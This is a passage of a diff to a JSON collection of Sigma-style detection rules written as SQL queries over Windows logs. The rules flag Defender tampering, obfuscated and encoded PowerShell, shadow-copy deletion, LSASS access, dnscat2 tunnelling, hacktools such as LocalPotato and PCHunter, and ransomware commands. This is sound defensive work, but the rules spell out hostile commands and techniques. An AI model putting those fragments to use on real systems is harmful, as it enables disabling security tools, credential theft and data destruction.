'%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'megasync.exe' AND NOT (NewProcessName LIKE '%\\\\megasync.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_tamper_defender.yml" + "filename": "proc_creation_win_renamed_megasync.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic", - "id": "ed965133-513f-41d9-a441-e38076a0798f", + "title": "Regedit as Trusted Installer", + "id": "883835a7-df45-43e4-bf1d-4268768afda4", "status": "test", - "description": "Detects suspicious PowerShell invocation command parameters", + "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_invocation_generic.yml" + "filename": "proc_creation_win_regedit_trustedinstaller.yml" }, { - "title": "Silence.EDA Detection", - "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", - "status": "test", - "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", - "author": "Alina Stepchenkova, Group-IB, oscd.community", - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1572", - "attack.impact", - "attack.t1529", - "attack.g0091", - "attack.s0363" - ], + "title": "HackTool - PCHunter Execution", + "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", + "status": "experimental", + "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" ], - "filename": "posh_ps_apt_silence_eda.yml" + "filename": "proc_creation_win_hktl_pchunter.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", - "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "title": "HackTool - LocalPotato Execution", + "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "cve.2023.21746" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" + "filename": "proc_creation_win_hktl_localpotato.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", - "id": "e54f5149-6ba3-49cf-b153-070d24679126", - "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Suspicious Call by Ordinal", + "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", + "status": "stable", + "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment", + "Windows control panel elements have been identified as source (mmc)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" ], - "filename": "posh_ps_invoke_obfuscation_via_var.yml" + "filename": "proc_creation_win_rundll32_by_ordinal.yml" }, { - "title": "Code Executed Via Office Add-in XLL File", - "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", - "status": "test", - "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1137.006" - ], + "title": "Suspicious PowerShell IEX Execution Patterns", + "id": "09576804-7a05-458e-a817-eb718ca91f54", + "status": "experimental", + "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate scripts that use IEX" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" ], - "filename": "posh_ps_office_comobject_registerxll.yml" + "filename": "proc_creation_win_powershell_iex_patterns.yml" }, { - "title": "Disable Powershell Command History", - "id": "602f5669-6927-4688-84db-0d4b7afb2150", - "status": "experimental", - "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", - "author": "Ali Alwashali", + "title": "Potential Snatch Ransomware Activity", + "id": "5325945e-f1f0-406e-97b8-65104d393fff", + "status": "stable", + "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.execution", + "attack.t1204" ], "falsepositives": [ - "Legitimate script that disables the command history" + "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" ], - "filename": "posh_ps_disable_psreadline_command_history.yml" + "filename": "proc_creation_win_malware_snatch_ransomware.yml" }, { - "title": "Potential Persistence Via Security Descriptors - ScriptBlock", - "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", - "status": "experimental", - "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Rar Usage with Password and Compression Level", + "id": "faa48cae-6b25-4f00-a094-08947fef582f", + "status": "test", + "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", + "author": "@ROxPinTeddy", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of Winrar command line version", + "Other command line tools, that use these flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_ace_tampering.yml" + "filename": "proc_creation_win_rar_compression_with_password.yml" }, { - "title": "Malicious ShellIntel PowerShell Commandlets", - "id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "title": "Suspicious GUP Usage", + "id": "0a4f6091-223b-41f6-8743-f322ec84930b", "status": "test", - "description": "Detects Commandlet names from ShellIntel exploitation scripts.", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-GPOLinks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Potato%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" ], - "filename": "posh_ps_shellintel_malicious_commandlets.yml" + "filename": "proc_creation_win_gup_suspicious_execution.yml" }, { - "title": "PowerShell Get-Process LSASS in ScriptBlock", - "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", - "status": "test", - "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "title": "Whoami.EXE Execution Anomaly", + "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "status": "experimental", + "description": "Detects the execution of whoami.exe with suspicious parent processes.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentProcessName = '') OR (ParentProcessName = '')))" ], - "filename": "posh_ps_susp_getprocess_lsass.yml" + "filename": "proc_creation_win_whoami_parent_anomaly.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Powershell", - "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", + "title": "Suspicious Process Parents", + "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (NewProcessName = '')))))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_susp_parents.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", - "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "title": "Potential PowerShell Command Line Obfuscation", + "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", + "status": "test", + "description": "Detects the PowerShell command lines with special characters", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.execution", + "attack.defense_evasion", + "attack.t1027", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Amazon SSM Document Worker", + "Windows Defender ATP" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%gcim%' ESCAPE '\\') AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%rwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*' OR CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*' OR CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*' OR CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\') OR ((CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" ], - "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" + "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Powershell", - "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", + "title": "Add Insecure Download Source To Winget", + "id": "81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2", "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects usage of winget to add a new insecure (http) download source.\nWinget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "False positives might occur if the users are unaware of such control checks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%http://%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" + "filename": "proc_creation_win_winget_add_insecure_custom_source.yml" }, { - "title": "Create Volume Shadow Copy with Powershell", - "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "title": "Potential Privilege Escalation via Service Permissions Weakness", + "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", "status": "test", - "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", - "author": "frack113", + "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", + "author": "Teymur Kheirkhabarov", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" ], - "filename": "posh_ps_create_volume_shadow_copy.yml" + "filename": 